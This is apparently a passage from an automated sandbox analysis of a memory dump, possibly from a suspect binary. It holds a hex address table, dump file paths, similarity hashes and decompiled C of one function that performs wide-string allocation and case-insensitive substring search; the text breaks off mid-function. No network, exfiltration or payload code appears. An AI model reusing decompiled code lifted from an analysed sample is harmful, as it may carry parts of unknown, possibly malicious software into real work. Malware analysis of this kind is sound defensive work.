0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a65a3
0x00000000
0x6e7a6592
0x6e7a6590
0x00000000
0x6e7a6588
0x6e7a6e85
0x6e7a6e88
0x00000000
0x6e7a6542
0x6e7a6544
0x6e7a6546
0x6e7a6549
0x6e7a6553
0x6e7a6556
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a6556
0x6e7a6e74
0x6e7a6e77
0x6e7a6e7d
0x6e7a6e7d
0x6e7a6e77
0x6e7a6540
0x6e7a65aa
0x6e7a65b5
0x6e7a65bc
0x6e7a65d4
0x6e7a65d8
0x6e7a65de
0x6e7a65e6
0x6e7a65e6
0x6e7a65f4
0x6e7a65f7
0x6e7a65fb
0x6e7a65fc
0x6e7a6601
0x6e7a6604
0x6e7a660a
0x6e7a6659
0x6e7a660c
0x6e7a660e
0x6e7a6610
0x6e7a6613
0x6e7a6617
0x6e7a661b
0x6e7a661f
0x6e7a6621
0x6e7a6624
0x6e7a6624
0x6e7a6625
0x6e7a662a
0x6e7a6630
0x00000000
0x00000000
0x6e7a6632
0x6e7a6636
0x6e7a663b
0x00000000
0x00000000
0x00000000
0x6e7a663b
0x6e7a663d
0x6e7a6641
0x6e7a6641
0x6e7a6617
0x6e7a6644
0x6e7a6646
0x6e7a6647
0x6e7a664b
0x6e7a6650
0x6e7a6654
0x6e7a6654
0x6e7a6660
0x6e7a6664
0x6e7a65be
0x6e7a65be
0x6e7a65be
0x6e7a6668
0x6e7a6670
0x6e7a6675
0x6e7a667b
0x6e7a6e6d
0x6e7a6681
0x6e7a6683
0x6e7a6686
0x6e7a669e
0x6e7a66a2
0x6e7a66ae
0x6e7a66b4
0x6e7a66b4
0x6e7a66b9
0x6e7a66bd
0x6e7a66c3
0x00000000
0x00000000
0x6e7a66c9
0x6e7a66ce
0x00000000
0x6e7a66d0
0x6e7a66d6
0x6e7a66eb
0x6e7a66eb
0x6e7a66d8
0x6e7a66d8
0x6e7a66e2
0x6e7a66e9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a66e9
0x00000000
0x6e7a66d8
0x6e7a66d6
0x00000000
0x6e7a66ce
0x6e7a6e66
0x6e7a6e69
0x00000000
0x6e7a6688
0x6e7a668a
0x6e7a668c
0x6e7a668f
0x6e7a6699
0x6e7a669c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a669c
0x6e7a6e55
0x6e7a6e58
0x6e7a6e5e
0x6e7a6e5e
0x6e7a6e58
0x6e7a6686
0x6e7a66f0
0x6e7a66f0
0x6e7a66fb
0x6e7a6702
0x6e7a6712
0x6e7a6715
0x6e7a6719
0x6e7a671f
0x6e7a6727
0x6e7a6727
0x6e7a6734
0x6e7a6737
0x6e7a673b
0x6e7a673c
0x6e7a6741
0x6e7a6744
0x6e7a674a
0x6e7a679d
0x6e7a674c
0x6e7a674e
0x6e7a6750
0x6e7a6753
0x6e7a6757
0x6e7a675b
0x6e7a675f
0x6e7a6761
0x6e7a6764
0x6e7a6764
0x6e7a6765
0x6e7a676a
0x6e7a6770
0x00000000
0x00000000
0x6e7a6772
0x6e7a6776
0x6e7a677b
0x00000000
0x00000000
0x00000000
0x6e7a677b
0x6e7a677d
0x6e7a6781
0x6e7a6784
0x6e7a6784
0x6e7a6757
0x6e7a6788
0x6e7a678a
0x6e7a678b
0x6e7a678f
0x6e7a6794
0x6e7a6798
0x6e7a6798
0x6e7a67a4
0x6e7a67a8
0x6e7a67a8
0x6e7a67ac
0x6e7a67b0
0x6e7a6526
0x6e7a6526
0x6e7a6526
0x6e7a67b7
0x6e7a6e4e
0x6e7a67bd
0x6e7a67bf
0x6e7a67c2
0x6e7a67da
0x6e7a67de
0x6e7a67ea
0x6e7a67f0
0x6e7a67f0
0x6e7a67f5
0x6e7a67f9
0x6e7a67ff
0x00000000
0x00000000
0x6e7a6805
0x6e7a680a
0x00000000
0x6e7a680c
0x6e7a6812
0x6e7a6827
0x6e7a6827
0x6e7a6814
0x6e7a6814
0x6e7a681e
0x6e7a6825
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a6825
0x00000000
0x6e7a6814
0x6e7a6812
0x00000000
0x6e7a680a
0x6e7a6e47
0x6e7a6e4a
0x00000000
0x6e7a67c4
0x6e7a67c6
0x6e7a67c8
0x6e7a67cb
0x6e7a67d5
0x6e7a67d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a67d8
0x6e7a6e36
0x6e7a6e39
0x6e7a6e3f
0x6e7a6e3f
0x6e7a6e39
0x6e7a67c2
0x6e7a682c
0x6e7a6837
0x6e7a683e
0x6e7a6856
0x6e7a685a
0x6e7a6860
0x6e7a6868
0x6e7a6868
0x6e7a6876
0x6e7a6879
0x6e7a687d
0x6e7a687e
0x6e7a6883
0x6e7a6886
0x6e7a688c
0x6e7a68db
0x6e7a688e
0x6e7a6890
0x6e7a6892
0x6e7a6895
0x6e7a6899
0x6e7a689d
0x6e7a68a1
0x6e7a68a3
0x6e7a68a6
0x6e7a68a6
0x6e7a68a7
0x6e7a68ac
0x6e7a68b2
0x00000000
0x00000000
0x6e7a68b4
0x6e7a68b8
0x6e7a68bd
0x00000000
0x00000000
0x00000000
0x6e7a68bd
0x6e7a68bf
0x6e7a68c3
0x6e7a68c3
0x6e7a6899
0x6e7a68c6
0x6e7a68c8
0x6e7a68c9
0x6e7a68cd
0x6e7a68d2
0x6e7a68d6
0x6e7a68d6
0x6e7a68e2
0x6e7a68e6
0x6e7a6840
0x6e7a6840
0x6e7a6840
0x00000000

Strings

@, xrefs: 6E7A6DCB

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction ID: dc0f71c03db8c9c1221e52fbdbc661170c966e704c943158fb5ab6adc3d3d5bd
Opcode Fuzzy Hash: ca296c8c1b784dec66269739aff920a48213b076e99651e2a44e7fe70c450e0f
Instruction Fuzzy Hash: F2723D7191C7538AE719CEFDC59031A7AE26FC2344F19C76CDAA50B3B5D635CA018B82

Uniqueness

Uniqueness Score: -1.00%

Function 6E79C590, Relevance: 2.1, Strings: 1, Instructions: 878
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E79C590(signed int* __ecx, void* __eflags, signed int* _a4, signed int _a8) {
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed short* _t304;
				unsigned int _t312;
				signed int _t313;
				signed short** _t319;
				signed short* _t323;
				signed int* _t325;
				signed int _t330;
				signed int _t334;
				signed int _t338;
				unsigned int _t340;
				unsigned int _t341;
				signed int _t343;
				unsigned int _t344;
				signed int _t345;
				signed int _t349;
				signed int _t350;
				signed int _t352;
				signed int _t357;
				signed int _t360;
				unsigned int _t366;
				signed int _t367;
				void* _t373;
				signed int _t376;
				signed int _t377;
				unsigned int _t383;
				unsigned int _t384;
				signed int _t386;
				signed int _t387;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int* _t405;
				signed int _t406;
				signed int _t412;
				signed int _t418;
				signed int _t421;
				signed int _t426;
				signed int _t432;
				signed int _t434;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t452;
				signed int _t457;
				signed int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t469;
				signed int _t476;
				signed int _t479;
				signed int _t480;
				signed int _t483;
				signed int _t484;
				signed int _t485;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				signed int _t491;
				signed int _t492;
				void* _t493;
				signed int _t494;
				signed int _t495;
				signed int _t498;
				intOrPtr* _t500;
				signed int _t501;
				signed int _t502;
				intOrPtr* _t503;
				signed int _t504;
				signed int _t505;
				signed int _t508;
				signed int _t510;
				signed int _t513;
				signed int _t518;
				void* _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				void* _t523;
				signed int _t524;
				signed int _t525;
				signed int _t528;
				signed int* _t529;
				signed int _t530;
				signed int _t534;
				signed int _t537;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t552;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t559;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t570;
				signed int _t571;
				signed int _t574;
				signed int _t581;
				signed short* _t582;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				intOrPtr* _t594;
				signed int _t595;
				signed short* _t596;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t609;
				signed int _t611;
				signed int* _t614;

				_v64 = 0;
				_t405 = __ecx;
				_v60 = 0;
				_push(0x80);
				_t551 = E6E791030();
				_t614 = (_t611 & 0xfffffff0) - 0x34 + 4;
				_t304 = _v64;
				if(_t304 == 0) {
					__eflags = 0;
					 *_t551 = 0;
					L8:
					_v60 = 0x40;
					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E6E791030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E6E7910B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E6E791030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E6E7910B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E6E7910B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E6E791030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E6E7910B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E6E791030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
																									if(_t406 == 0) {
																										L162:
																										_push(2);
																										_push(_t357);
																										E6E7910B0();
																										_t614 =  &(_t614[2]);
																										goto L60;
																									}
																									_t521 =  *_t357 & 0x0000ffff;
																									 *_t406 = _t521;
																									__eflags = _t521;
																									if(_t521 == 0) {
																										goto L162;
																									}
																									_t522 = 0;
																									__eflags = 0;
																									while(1) {
																										_t522 = _t522 + 1;
																										_t479 =  *(_t357 + _t522 * 4 - 2) & 0x0000ffff;
																										 *(_t406 + _t522 * 4 - 2) = _t479;
																										__eflags = _t479;
																										if(_t479 == 0) {
																											goto L162;
																										}
																										_t480 =  *(_t357 + _t522 * 4) & 0x0000ffff;
																										 *(_t406 + _t522 * 4) = _t480;
																										__eflags = _t480;
																										if(_t480 != 0) {
																											continue;
																										}
																										goto L162;
																									}
																									goto L162;
																								}
																								_t360 =  *_t566 & 0x0000ffff;
																								__eflags = _t360;
																								if(_t360 == 0) {
																									goto L156;
																								}
																								__eflags = _t434;
																								if(_t434 != 0) {
																									L136:
																									_t176 = _t434 + 1; // 0x80000000
																									_t523 = _t176;
																									__eflags = _t523 - 0x40;
																									_t524 =  <=  ? 0x40 : _t523;
																									__eflags = _t524;
																									if(_t524 > 0) {
																										_t366 = (_t524 >> 5 >> 0x1a) + _t524 >> 6;
																										_t525 = _t524 & 0x8000003f;
																										__eflags = _t525;
																										if(_t525 < 0) {
																											_t525 = (_t525 - 0x00000001 | 0xffffffc0) + 1;
																											__eflags = _t525;
																										}
																										__eflags = _t525;
																										_t367 = _t366 + (0 | _t525 > 0x00000000);
																										 *_t614 = _t367 << 6;
																										_push(_t367 << 7);
																										_t595 = E6E791030();
																										_t614 =  &(_t614[1]);
																										_t528 =  *_a4;
																										__eflags = _t528;
																										if(_t528 == 0) {
																											__eflags = 0;
																											 *_t595 = 0;
																											goto L148;
																										} else {
																											__eflags = _t595;
																											if(_t595 == 0) {
																												L146:
																												_push(2);
																												_push(_t528);
																												E6E7910B0();
																												_t614 =  &(_t614[2]);
																												L148:
																												_t529 = _a4;
																												_t529[1] =  *_t614;
																												 *_t529 = _t595;
																												L149:
																												__eflags = _t595;
																												if(_t595 == 0) {
																													goto L61;
																												}
																												_t373 = 0;
																												while(1) {
																													_t530 =  *_t566 & 0x0000ffff;
																													_t373 = _t373 + 1;
																													 *_t595 = _t530;
																													__eflags = _t434;
																													if(_t434 == 0) {
																														goto L154;
																													}
																													__eflags = _t373 - _t434;
																													if(_t373 == _t434) {
																														 *(_t595 + 2) = 0;
																														goto L61;
																													}
																													L154:
																													__eflags = _t530;
																													if(_t530 == 0) {
																														goto L61;
																													}
																													_t595 = _t595 + 2;
																													_t566 = _t566 + 2;
																													__eflags = _t566;
																												}
																											}
																											_t376 =  *_t528 & 0x0000ffff;
																											 *_t595 = _t376;
																											__eflags = _t376;
																											if(_t376 == 0) {
																												goto L146;
																											}
																											_t377 = 0;
																											__eflags = 0;
																											while(1) {
																												_t377 = _t377 + 1;
																												_t483 =  *(_t528 + _t377 * 4 - 2) & 0x0000ffff;
																												 *(_t595 + _t377 * 4 - 2) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													goto L146;
																												}
																												_t484 =  *(_t528 + _t377 * 4) & 0x0000ffff;
																												 *(_t595 + _t377 * 4) = _t484;
																												__eflags = _t484;
																												if(_t484 != 0) {
																													continue;
																												}
																												goto L146;
																											}
																											goto L146;
																										}
																									}
																									_t595 = 0;
																									goto L149;
																								}
																								_t534 = _t566 & 0x0000000f;
																								__eflags = _t534;
																								if(_t534 == 0) {
																									L129:
																									_t434 =  ~( ~_t534 + 0x00000007 & 0x00000007) + 0x7fffffff;
																									__eflags = _t434;
																									while(1) {
																										asm("movdqu xmm1, [edi+edx*2]");
																										asm("pcmpeqw xmm1, xmm0");
																										asm("pmovmskb eax, xmm1");
																										__eflags = _t360;
																										if(_t360 != 0) {
																											break;
																										}
																										_t534 = _t534 + 8;
																										__eflags = _t534 - _t434;
																										if(_t534 < _t434) {
																											continue;
																										}
																										__eflags = _t434 - 0x7fffffff;
																										if(_t434 >= 0x7fffffff) {
																											L135:
																											_t434 = 0x7fffffff;
																											goto L136;
																										} else {
																											goto L133;
																										}
																										while(1) {
																											L133:
																											__eflags =  *(_t566 + _t434 * 2) & 0x0000ffff;
																											if(( *(_t566 + _t434 * 2) & 0x0000ffff) == 0) {
																												goto L136;
																											}
																											_t434 = _t434 + 1;
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 < 0x7fffffff) {
																												continue;
																											}
																											goto L135;
																										}
																										goto L136;
																									}
																									asm("bsf ebx, eax");
																									_t434 = (_t434 >> 1) + _t534;
																									goto L136;
																								}
																								_t434 = 0;
																								__eflags = _t534 & 0x00000001;
																								if((_t534 & 0x00000001) != 0) {
																									goto L133;
																								}
																								_t534 =  ~_t534 + 0x10 >> 1;
																								__eflags = _t534;
																								while(1) {
																									_t360 =  *(_t566 + _t434 * 2) & 0x0000ffff;
																									__eflags = _t360;
																									if(_t360 == 0) {
																										goto L136;
																									}
																									_t434 = _t434 + 1;
																									__eflags = _t434 - _t534;
																									if(_t434 < _t534) {
																										continue;
																									}
																									goto L129;
																								}
																								goto L136;
																							} else {
																								goto L118;
																							}
																							while(1) {
																								L118:
																								__eflags =  *(_t565 + _t432 * 2) & 0x0000ffff;
																								if(( *(_t565 + _t432 * 2) & 0x0000ffff) == 0) {
																									goto L121;
																								}
																								_t432 = _t432 + 1;
																								__eflags = _t432 - 0x7fffffff;
																								if(_t432 < 0x7fffffff) {
																									continue;
																								}
																								goto L120;
																							}
																							goto L121;
																						}
																						asm("bsf ebx, edx");
																						_t432 = (_t432 >> 1) + _t352;
																						goto L121;
																					}
																					_t432 = 0;
																					__eflags = _t352 & 0x00000001;
																					if((_t352 & 0x00000001) != 0) {
																						goto L118;
																					}
																					_t352 =  ~_t352 + 0x10 >> 1;
																					__eflags = _t352;
																					while(1) {
																						_t510 =  *(_t565 + _t432 * 2) & 0x0000ffff;
																						__eflags = _t510;
																						if(_t510 == 0) {
																							goto L121;
																						}
																						_t432 = _t432 + 1;
																						__eflags = _t432 - _t352;
																						if(_t432 < _t352) {
																							continue;
																						}
																						goto L114;
																					}
																					goto L121;
																				} else {
																					goto L106;
																				}
																				while(1) {
																					L106:
																					__eflags =  *(_t593 + _t476 * 2) & 0x0000ffff;
																					if(( *(_t593 + _t476 * 2) & 0x0000ffff) == 0) {
																						goto L109;
																					}
																					_t476 = _t476 + 1;
																					__eflags = _t476 - 0x7fffffff;
																					if(_t476 < 0x7fffffff) {
																						continue;
																					}
																					goto L108;
																				}
																				goto L109;
																			}
																			asm("bsf ecx, eax");
																			_t476 = (_t476 >> 1) + _t510;
																			goto L109;
																		}
																		_t476 = 0;
																		__eflags = _t350;
																		if(_t350 != 0) {
																			goto L106;
																		}
																		_t510 = _v52;
																		_t441 = _t510;
																		while(1) {
																			_t350 =  *(_t593 + _t476 * 2) & 0x0000ffff;
																			__eflags = _t350;
																			if(_t350 == 0) {
																				goto L109;
																			}
																			_t476 = _t476 + 1;
																			__eflags = _t476 - _t441;
																			if(_t476 < _t441) {
																				continue;
																			}
																			goto L102;
																		}
																		goto L109;
																	}
																	_t485 = _v48;
																	_t510 = _v32;
																	_t570 = _v52;
																	_t383 = _v28;
																	while(1) {
																		_t598 = _t510;
																		__eflags = _t510;
																		if(_t510 == 0) {
																			goto L180;
																		}
																		L175:
																		_t452 = 0;
																		__eflags = _t383;
																		if(_t383 != 0) {
																			L184:
																			_v28 = _t383;
																			_t602 = _v24;
																			while(1) {
																				__eflags =  *(_t602 + _t452 * 2) & 0x0000ffff;
																				if(( *(_t602 + _t452 * 2) & 0x0000ffff) == 0) {
																					break;
																				}
																				_t452 = _t452 + 1;
																				__eflags = _t452 - 0x7fffffff;
																				if(_t452 < 0x7fffffff) {
																					continue;
																				}
																				_v24 = _t602;
																				_t384 = _v28;
																				L188:
																				_t452 = 0x7fffffff;
																				L189:
																				_v56 = _t452;
																				_t599 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t384;
																				while(1) {
																					_t453 =  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t241 = _t453 - 0x61; // 0x7fffff9e
																					_t574 =  *(_v24 + _t599 * 2) & 0x0000ffff;
																					__eflags = _t241 - 0x19;
																					_t244 = _t453 - 0x20; // 0x7fffffdf
																					_t454 =  <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t386 = ( <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff) & 0x0000ffff;
																					__eflags = _t574 - 0x61 - 0x19;
																					_t575 =  <=  ? _t574 - 0x20 : _t574;
																					__eflags = _t386 - ( <=  ? _t574 - 0x20 : _t574);
																					if(__eflags < 0 || __eflags > 0) {
																						break;
																					}
																					__eflags = _t386;
																					if(_t386 == 0) {
																						L194:
																						_t564 =  *_t614;
																						_t592 = _t599 ^ _t599;
																						__eflags = _t592;
																						_t510 = _v32;
																						L195:
																						__eflags = _t485;
																						if(_t485 != 0) {
																							goto L91;
																						}
																						goto L196;
																					}
																					_t599 = _t599 + 1;
																					__eflags = _t599 - _v56;
																					if(_t599 < _v56) {
																						continue;
																					}
																					goto L194;
																				}
																				_t510 = _v32;
																				_t350 = _v28;
																				_t601 = _t485 + 2;
																				__eflags = _t601;
																				if(_t601 == 0) {
																					L207:
																					_t565 = _v36;
																					_t593 = _v24;
																					goto L97;
																				}
																				__eflags =  *(_t485 + 2) & 0x0000ffff;
																				if(( *(_t485 + 2) & 0x0000ffff) == 0) {
																					goto L207;
																				}
																				_v40 = _t485;
																				_t457 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t350;
																				while(1) {
																					_t457 = _t457 + 1;
																					_t485 = _v40 + _t457 * 2;
																					_t387 =  *_t485 & 0x0000ffff;
																					__eflags = ( *(_t601 + _t457 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
